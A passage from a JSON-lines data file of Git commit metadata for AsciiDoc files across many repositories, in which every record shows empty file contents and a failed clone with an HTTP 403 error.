2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed1bb2c5beec8fd9f099cf6f3fa87ad5dbad8016","subject":"Update README","message":"Update README\n","repos":"pjanouch\/json-rpc-shell,pjanouch\/json-rpc-shell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/json-rpc-shell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"3ac1da111b6949c4a174da5cff4b39e9139f971a","subject":"Add readme","message":"Add readme\n","repos":"mdenchev\/mui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdenchev\/mui.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ec07d75ade52bc20ac11f3abb0117c306beb74","subject":"README (work in progress)","message":"README (work in progress)","repos":"ajneu\/fractionizer,ajneu\/fractionizer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/fractionizer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"986487b7ac41f382dfa402f671914798c06eaea1","subject":"Add the README.","message":"Add the README.\n","repos":"joshuawilson\/presentations,joshuawilson\/presentations,joshuawilson\/presentations,joshuawilson\/presentations","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuawilson\/presentations.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a09633bd0323a98f087bf6c6f1055ce7faeabe5","subject":"Add badge for code scan","message":"Add badge for code scan","repos":"hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2,hwolf\/oauth2","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hwolf\/oauth2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"98fd21d5eff93d3ec52d328cb6f9d255523e6e9d","subject":"y2b create post SMS Audio STREET by 50 - On-Ear Wired Headphones Unboxing \\u0026 Overview","message":"y2b create post SMS Audio STREET by 50 - On-Ear Wired Headphones Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-23-SMS-Audio-STREET-by-50--OnEar-Wired-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-03-23-SMS-Audio-STREET-by-50--OnEar-Wired-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d47532e9626ea45b9f1138882ccaccd16bc92b3","subject":"added readme","message":"added readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"netty\/basic\/readme.adoc","new_file":"netty\/basic\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c11df4b4200902ba2f8e03c831a3536fb8afdc3","subject":"Wording Interf","message":"Wording Interf\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f81518d81a9018a8a62bff75c1a7ac5a53a17cb5","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d355012e62435dfb73c8ae09993ca66288b47659","subject":"Update 2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","message":"Update 2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","new_file":"_posts\/2017-03-27-Deployment-of-web-applications-through-Intellij-Idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"647326862c2be94f830c997706e9090391560548","subject":"Added a HACKING document to describe the basics of contributing to development","message":"Added a HACKING document to describe the basics of contributing to development\n","repos":"ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,asciidoctor\/asciidoctor-gradle-plugin,mojavelinux\/asciidoctor-gradle-plugin,ysb33r\/asciidoctor-gradle-plugin","old_file":"HACKING.adoc","new_file":"HACKING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mojavelinux\/asciidoctor-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd59574687ba4eea1bc53ab72ca9509e389ec7cd","subject":"Update 2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","message":"Update 2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","new_file":"_posts\/2017-09-05-TWCTF-2017-BabyDLP-BabyRSA-3-Rev.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a459cf6ab0db6b049bc8369b55f5549e2796756","subject":"CL note: macro -> closure","message":"CL note: macro -> closure\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8f848b83749b38cf2e216776155e36177f3e321a","subject":"Added README","message":"Added README\n","repos":"Maarc\/windup,jsight\/windup,windup\/windup,d-s\/windup,mbriskar\/windup,OndraZizka\/windup,mbriskar\/windup,Ladicek\/windup,johnsteele\/windup,lincolnthree\/windup,OndraZizka\/windup,sgilda\/windup,mareknovotny\/windup,windup\/windup-legacy,mbriskar\/windup,johnsteele\/windup,lincolnthree\/windup,johnsteele\/windup,bradsdavis\/windup,Maarc\/windup,windup\/windup,d-s\/windup,bradsdavis\/windup,windup\/windup-sample-apps,Ladicek\/windup,windup\/windup-legacy,sgilda\/windup,mbriskar\/windup,mareknovotny\/windup,bradsdavis\/windup,d-s\/windup,OndraZizka\/windup,jsight\/windup,mareknovotny\/windup,lincolnthree\/windup,jsight\/windup,windup\/windup,sgilda\/windup,lincolnthree\/windup,OndraZizka\/windup,Maarc\/windup,windup\/windup,sgilda\/windup,windup\/windup-legacy,Ladicek\/windup,Ladicek\/windup,johnsteele\/windup,jsight\/windup,mareknovotny\/windup,d-s\/windup,Maarc\/windup","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ladicek\/windup.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d57526e72e009f9d6b2fd2ca49c689e845a0fc1b","subject":"y2b create post World's Smallest Android Phone!","message":"y2b create post World's Smallest Android Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-17-Worlds-Smallest-Android-Phone.adoc","new_file":"_posts\/2016-04-17-Worlds-Smallest-Android-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1c9cde5e77ce45895b494a0bc193a8f536cd152","subject":"Configuration for the tensorics repo.","message":"Configuration for the tensorics repo.\n\nIt should start working as soon as we add travis and Coveralls.\nConflicts:\n\tREADME.asciidoc\n\n\ngit-svn-id: 44110302500ff4d6168e3867631ad1bb4eb9722b@11178 6cd15df7-5b2d-4548-a7df-5dcce267a22b\n","repos":"tensorics\/tensorics-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tensorics\/tensorics-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65ce12938af67b4dc96d6c779b26719c6778d55d","subject":"job: #11455 introducing analysis of Deployment Export","message":"job: #11455 introducing analysis of Deployment Export\n","repos":"cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,lwriemen\/mc,xtuml\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,xtuml\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/11444_wasl\/11455_export_depl_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11455_export_depl_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf512861eb3c58e82881467d3ee367c4fef5b99b","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b9f836d2867297199b13822e117e7490f554f542","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b6c7e7ed216230c19c4683d5d0b8cf3fc15b43f","subject":"Deleted 2017-02-25adocadoc-part-1.adoc","message":"Deleted 2017-02-25adocadoc-part-1.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adocadoc-part-1.adoc","new_file":"2017-02-25adocadoc-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e33b635e3de09c9fb0ed3768ee2f169925ba46eb","subject":"Update 2016-07-15-who-am-i.adoc","message":"Update 2016-07-15-who-am-i.adoc","repos":"dmacstack\/glob,dmacstack\/glob,dmacstack\/glob,dmacstack\/glob","old_file":"_posts\/2016-07-15-who-am-i.adoc","new_file":"_posts\/2016-07-15-who-am-i.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmacstack\/glob.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cfd4c8a40ac1391b1859f84e286824d12b8315e","subject":"Update 2017-03-06-A-G-Poem.adoc","message":"Update 2017-03-06-A-G-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-06-A-G-Poem.adoc","new_file":"_posts\/2017-03-06-A-G-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12162aafc22ac1bb82f72fecc42c785432740f84","subject":"Update 2017-04-08-Next-Poem.adoc","message":"Update 2017-04-08-Next-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-08-Next-Poem.adoc","new_file":"_posts\/2017-04-08-Next-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddb88752fda27483ec475a62e29a9a690a334cf1","subject":"Update 2017-08-08-adjmotion.adoc","message":"Update 2017-08-08-adjmotion.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-08-adjmotion.adoc","new_file":"_posts\/2017-08-08-adjmotion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2507637cf8a4d49191242d69a546799fca02ad85","subject":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","message":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92c1492946077585eca34f23241410e6d3bd988b","subject":"First shot at some WF-Swarm web-presence.","message":"First shot at some WF-Swarm web-presence.\n","repos":"rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org","old_file":"swarm\/index.adoc","new_file":"swarm\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e94b185363e4c8433577bd5d617a2999f0f5ab4","subject":"Update 2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","message":"Update 2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","new_file":"_posts\/2017-08-29-proxmox-installer-resolution-problem-out-of-range-cannot-display-the-video-mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"775a5a11ea1bca09f5f7dc12b3feba6fe2b8ae36","subject":"Update 2016-04-09-Hello-Ascii-Doc.adoc","message":"Update 2016-04-09-Hello-Ascii-Doc.adoc","repos":"buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io,buliaoyin\/buliaoyin.github.io","old_file":"_posts\/2016-04-09-Hello-Ascii-Doc.adoc","new_file":"_posts\/2016-04-09-Hello-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/buliaoyin\/buliaoyin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"722e30a5be8fb4cc171441d0110462912d39c3f3","subject":"Update 2016-04-16-Nullifying-Null.adoc","message":"Update 2016-04-16-Nullifying-Null.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-16-Nullifying-Null.adoc","new_file":"_posts\/2016-04-16-Nullifying-Null.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68cc6a64fb1229a50546610e77468bd5107e4778","subject":"Update 2017-08-07-Hello-Hub-Press.adoc","message":"Update 2017-08-07-Hello-Hub-Press.adoc","repos":"adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press,adjiebpratama\/press","old_file":"_posts\/2017-08-07-Hello-Hub-Press.adoc","new_file":"_posts\/2017-08-07-Hello-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjiebpratama\/press.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"694387ef8a2a9f6182df3fa8144a22643d37fe7a","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28c6b7c0dc5de58a8bd7e26cda2be25e72433998","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45087150b5153fd36b2c9d3d60242aa5cf14f7de","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb3dde29e60bd8425ff9e75f074c577b561d1546","subject":"updated readme\/truncated, as wiki is getting larger","message":"updated readme\/truncated, as wiki is getting larger\n","repos":"lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,Applemann\/hypatia,brechin\/hypatia,brechin\/hypatia,lillian-lemmer\/hypatia","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf7bda643012b381b662ec81e1d9c3cfcaeb74be","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-repository.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f7812cf46ef1d237ae4cff022e617b794371b33","subject":"Update 2015-10-25-Que-tipo-de-campanas-de-email-existen-or-Email-Marketing.adoc","message":"Update 2015-10-25-Que-tipo-de-campanas-de-email-existen-or-Email-Marketing.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io","old_file":"_posts\/2015-10-25-Que-tipo-de-campanas-de-email-existen-or-Email-Marketing.adoc","new_file":"_posts\/2015-10-25-Que-tipo-de-campanas-de-email-existen-or-Email-Marketing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21830a5770520fbf730f6d7a50968e3b31ce6cf6","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fef5375755920fc6090e6e6db77690b1bd4b1823","subject":"New README for NT3 tests","message":"New README for NT3 tests\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"workflows\/nt3_mlrMBO\/test\/README.adoc","new_file":"workflows\/nt3_mlrMBO\/test\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2fdcbf6606c47d0be9709d91899a97d32f46dcf","subject":"RX filters doc","message":"RX filters doc\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7336241bdc7c6acf9d5ad97fb4f5b4ac633e7bca","subject":"Add style guid for artifacts.","message":"Add style guid for artifacts.\n","repos":"ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,Onager\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts,Onager\/artifacts,joachimmetz\/artifacts","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"62b1e9f6317244aaa35bb3cea8682238cb460caf","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7232c024136fb44ae348dae317079969da57a281","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"356a7200985d28164d51b94cc1768dab000ac869","subject":"Change capitalization of \"as\"","message":"Change capitalization of \"as\"\n\nThe documentation has \"Running As a Service on Linux\" and \"Running as a Service on Windows.\" The capitalization ought to be 